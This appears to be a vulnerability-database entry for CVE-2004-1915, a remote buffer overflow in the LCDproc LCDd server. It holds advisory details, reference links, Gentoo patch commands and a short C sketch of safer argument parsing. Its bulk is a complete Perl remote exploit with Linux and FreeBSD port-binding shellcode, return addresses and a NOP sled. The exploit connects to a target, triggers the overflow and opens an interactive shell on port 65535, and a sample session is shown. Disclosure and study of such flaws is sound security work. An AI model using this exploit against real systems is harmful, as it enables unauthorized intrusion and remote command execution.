CVE-2004-1915
CVSS 7.5
Published: 2004-04-08 00:00:00
Revised: 2016-10-17 23:02:53

[Original] Buffer overflow in the parse_all_client_messages function in LCDproc 0.4.x up to 0.4.4 allows remote attackers to execute arbitrary code via a large number of arguments.


[CNNVD] LCDproc LCDd Multiple Remote Vulnerabilities (CNNVD-200404-006)

A buffer overflow vulnerability exists in the parse_all_client_messages function of LCDproc 0.4.x through 0.4.4. Remote attackers can execute arbitrary code via a large number of arguments.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:lcdproc:lcdproc:4.1
cpe:/a:lcdproc:lcdproc:0.4
cpe:/a:lcdproc:lcdproc:0.4.1_r1
cpe:/a:lcdproc:lcdproc:4.0
cpe:/a:lcdproc:lcdproc:0.3
cpe:/a:lcdproc:lcdproc:4.4
cpe:/a:lcdproc:lcdproc:4.3
cpe:/a:lcdproc:lcdproc:4.2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1915
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1915
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200404-006
(official data source) CNNVD

- Other links and resources

http://lists.omnipotent.net/pipermail/lcdproc/2004-April/008884.html
(VENDOR_ADVISORY)  CONFIRM  http://lists.omnipotent.net/pipermail/lcdproc/2004-April/008884.html
http://marc.info/?l=bugtraq&m=108145722229810&w=2
(UNKNOWN)  BUGTRAQ  20040408 PSR - #2004-001 Remote - LCDProc
http://security.gentoo.org/glsa/glsa-200404-19.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200404-19
http://www.securityfocus.com/bid/10085
(VENDOR_ADVISORY)  BID  10085
http://xforce.iss.net/xforce/xfdb/15803
(VENDOR_ADVISORY)  XF  lcdproc-parseallclientmessages-bo(15803)

- Vulnerability information

LCDproc LCDd Multiple Remote Vulnerabilities
High risk  Buffer overflow
2004-04-08 00:00:00 2005-10-20 00:00:00
Remote
A buffer overflow vulnerability exists in the parse_all_client_messages function of LCDproc 0.4.x through 0.4.4. Remote attackers can execute arbitrary code via a large number of arguments.

- Advisories and patches

NOTE: It has been reported that the previously referenced fix was insufficient to resolve this issue.
Gentoo has released updates to address this issue. These updates may be applied with the following commands:
# emerge sync
# emerge -pv ">=app-misc/lcdproc-0.4.5"
# emerge ">=app-misc/lcdproc-0.4.5"
The vendor has released an upgraded version of the software which is reported to deal with this issue completely:
LCDProc LCDProc 4.4

- Vulnerability information (23936)

LCDproc LCDd 0.x/4.x Multiple Remote Vulnerabilities (EDBID:23936)
linux remote
2004-04-08 Verified
0 wsxz
N/A
source: http://www.securityfocus.com/bid/10085/info

LCDproc Server (LCDd) has been reported to be prone to multiple remote vulnerabilities.

The first issue is reported to exist in the parse_all_client_messages() function of parse.c, and is due to a lack of sufficient boundary checks performed on user-supplied arguments. A remote attacker may exploit this vulnerability to execute arbitrary instructions in the context of the vulnerable service.

The second issue exists in the test_func_func() function of client_functions.c. Due to a lack of sufficient boundary checks an attacker may pass data to the function in a manner that is sufficient to trigger a buffer overflow. An attacker may leverage this condition to execute code in the context of the affected service.

Finally, due to an erroneous implementation of a formatted print function contained in the test_func_func() function of client_functions.c, a remote attacker may supply format specifier characters. An attacker may leverage this condition to execute code in the context of the affected service.
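As an added illustration, not LCDproc's code and not taken from the advisory, the two defect classes the description names are sketched in C with hypothetical function names and a hypothetical argument cap: an argument splitter that rejects a line carrying more tokens than its fixed array can hold, and a reply formatter that passes client text as a %s argument rather than as the format string.

```c
/* Hypothetical sketch of the flaw classes described in BID 10085.
 * This is NOT LCDproc's code; names, limits and messages are assumptions. */
#include <stdio.h>
#include <string.h>

#define MAX_ARGS 32   /* hypothetical cap; the real LCDd limit is not on the page */
#define MAX_LINE 256  /* hypothetical maximum client line length */

/* Vulnerable pattern (shown for contrast, not compiled): tokens are stored in
 * a fixed-size array with no check on the count, so a client line with a
 * large number of arguments writes past the end of argv[]:
 *
 *   char *argv[MAX_ARGS]; int argc = 0;
 *   for (tok = strtok(line, " "); tok; tok = strtok(NULL, " "))
 *       argv[argc++] = tok;              // unbounded index
 */

/* Hardened splitter: returns the token count, or -1 when the line is too
 * long or holds more than 'max' tokens. 'line' is tokenised in place. */
int split_args(char *line, char *argv[], int max)
{
    int argc = 0;
    if (strlen(line) >= MAX_LINE)
        return -1;
    for (char *tok = strtok(line, " \t\n"); tok; tok = strtok(NULL, " \t\n")) {
        if (argc >= max)
            return -1;                   /* too many arguments: reject the line */
        argv[argc++] = tok;
    }
    return argc;
}

/* Vulnerable pattern: snprintf(out, n, client_text) lets any format
 * directives in the client text be interpreted by the formatter.
 * Hardened: the client text is only ever a %s argument. Returns the reply
 * length, or -1 if the reply would not fit in 'out'. */
int format_reply(char *out, size_t n, const char *client_text)
{
    int len = snprintf(out, n, "huh? unknown command: %s", client_text);
    return (len < 0 || (size_t)len >= n) ? -1 : len;
}
```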

#!/usr/bin/perl
# Priv8security.com remote exploit for lcdproc server version 0.4.1 and lower.
#
#   Vendor Url: http://lcdproc.omnipotent.net/
#   Play with offset "-o" to get shell.
#
#   [wsxz@localhost wsxz]$ perl priv8lcd.pl -h localhost -t 0
#
#   -=[ Priv8security.com LCDproc Server 0.4.1 and lower remote exploit ]=-
#
#   Connected!
#   [+] Using address: 0xbfffd904
#   [+] Checking version... Done!
#       Server is vuln :P
#   [+] Sending stuff... Done!
#   [+] Do we got a shell?
#   [+] Enjoy your stay on this server =)
#
#   ******  Welcome to 'localhost'  ******
#
#   Linux localhost.localdomain 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003
#   i686 unknown unknown GNU/Linux
#   uid=503(wsxz) gid=503(wsxz) groups=503(wsxz),13(news)
#
################################################################################

use IO::Socket;
use Getopt::Std; getopts('h:p:t:o:', \%args);


if (defined($args{'h'})) { $host   = $args{'h'}; }
if (defined($args{'p'})) { $port   = $args{'p'}; }else{$port = 13666;}
if (defined($args{'t'})) { $system = $args{'t'}; }
if (defined($args{'o'})) { $offset = $args{'o'}; }else{$offset = 0;}

print "\n-=[ Priv8security.com LCDproc Server 0.4.1 and lower remote exploit ]=-\n\n";
if(!defined($host)){
print "Usage:
        -h <host>
	-p port <default 13666>
	-t target:
	    0 - linux
	    1 - freebsd
	-o <offset>\n\n";
exit(1);
}

#Priv8 portbind shellcode by Ramon de Carvalho
$shellinux =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a".
"\x02\x89\xe1\xb0\x66\xcd\x80\xff".
"\x49\x02\x6a\x10\x51\x50\x89\xe1".
"\x43\xb0\x66\xcd\x80\x89\x41\x04".
"\xb3\x04\xb0\x66\xcd\x80\x43\xb0".
"\x66\xcd\x80\x59\x93\xb0\x3f\xcd".
"\x80\x49\x79\xf9\x68\x2f\x2f\x73".
"\x68\x68\x2f\x62\x69\x6e\x89\xe3".
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
#Priv8 portbind shellcode by Ramon de Carvalho
$shellfree =
"\x31\xc0\x50\x6a\x01\x6a\x02\x89".
"\xe7\x50\xb0\x61\xcd\x80\xff\x4f".
"\x02\x6a\x10\x57\x50\x50\xb0\x68".
"\xcd\x80\x89\x47\xf4\xb0\x6a\xcd".
"\x80\xb0\x1e\xcd\x80\x50\x50\xb0".
"\x5a\xcd\x80\xff\x4f\xec\x79\xf7".
"\x50\x68\x2f\x2f\x73\x68\x68\x2f".
"\x62\x69\x6e\x89\xe3\x50\x54\x53".
"\x50\xb0\x3b\xcd\x80";

if ($system == 1 ){#freebsd buffer
  $ret = 0xbfbfde58;
  $shellcode = $shellfree;
}

if ($system == 0){#linux buffer
  $ret = 0xbfffd658;
  $shellcode = $shellinux;
}

  $new_ret = pack('l', ($ret + $offset));
  $buffer .= "\x90" x (1322 - length($shellcode));
  $buffer .= $shellcode;
  $buffer .= $new_ret x 10;

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port,Type=>SOCK_STREAM,Reuse=>1)
or die "[-] Cant connect\n";

  print "Connected!\n";
  print "[+] Using address: 0x", sprintf('%lx',($ret)), "\n";
  print STDERR "[+] Checking version...";
  print $sock "hello\n";
  $awser = <$sock>;

    if($awser =~ /0.4.3/ || $awser =~ /0.4.4/  ){
      print STDERR " Done!\n";
      print STDERR "[-] The server is not vuln.\n";
      exit(1);
    }
  print STDERR " Done!\n";
  print STDERR "    Server is vuln :P\n";
  print STDERR "[+] Sending stuff... ";
  sleep(2);
  print $sock "$buffer\n";
  print STDERR "Done!\n";
  print "[+] Do we got a shell?\n";

  sleep(3);

$sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>65535,Type=>SOCK_STREAM,Reuse=>1)
or die "[-] No luck, try other offset next time ok.\n";

  print "[+] Enjoy your stay on this server =)\n";

  $sc->autoflush(1);
  print $sc "echo;echo \"******  Welcome to '`hostname`'  ******\"\n";
  print $sc "echo;uname -a;id;echo\n";

  die "cant fork: $!" unless defined($pid = fork());

  if ($pid) {
      while(defined ($line = <$sc>)) {
          print STDOUT $line;
      }
      kill("TERM", $pid);
  }
  else
  {
      while(defined ($line = <STDIN>)) {
          print $sc $line;
      }
  }
  close($sc);
  print "Good bye!!\n";


- Vulnerability information

5158
LCDProc parse_all_client_messages() Function Multiple Overflows
Remote / Network Access Input Manipulation
Loss of Integrity
Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-04-12 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete